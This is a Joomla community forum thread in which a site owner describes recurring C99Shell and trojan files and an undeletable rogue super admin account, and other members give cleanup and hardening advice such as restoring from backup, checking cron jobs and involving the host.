Joomla! Forum - community, help and support

One of my Joomla 1.5 websites was hacked. The site is fully patched and directory permission are 755/644. The hacker has been loading files like crp.php and int.php in the /images folder as well as other places. These files when downloaded are showing up as Rst.G trojan and C99Shell. I have been deleting the files but more show up within a day. RSFirewall hasn't reported anything yet the hacks continue.

What really disturbs me is that he has taken over a super admin account and I cannot delete it. If I delete it in Joomla (first demoting it to admin) it is removed from the list but when I check the database the account is still there. If I delete the account directly from the database it returns immediately. Has this kind of thing happened to anyone else?

Your site has been seriously compromised. Remove all files via ftp - remove any related databases and start again. Hopefully you have a backup of the site prior to the hack. Upload your site over the new Joomla install, create a new database and import your backup dbs. Through your contol panel, can you add password protection to folders? If so, add a strong password to the administrator directory. This will help prevent attacks from hackers navigating straight to: /administrator Ask your webhost to help with this if you're not sure.

If you can't remove the dbs - get your host to do it.

Take a look at this: http://forum.joomla.org/viewtopic.php?f=432&t=391251

Good luck!

can you also check your cron jobs to see if there is a system to reinfect you?

what has your host said?

Greetings:

mandville makes a good point as often times hackers will set up hourly, daily, or weekly jobs to replant their material.

Get your hosting provider involved to find how how security can be increased; especially since you stated you are on the latest version of Joomla.

Also, check if your provider has mod_security installed, and what additional layers of protection they have set up server wide.

Thank you.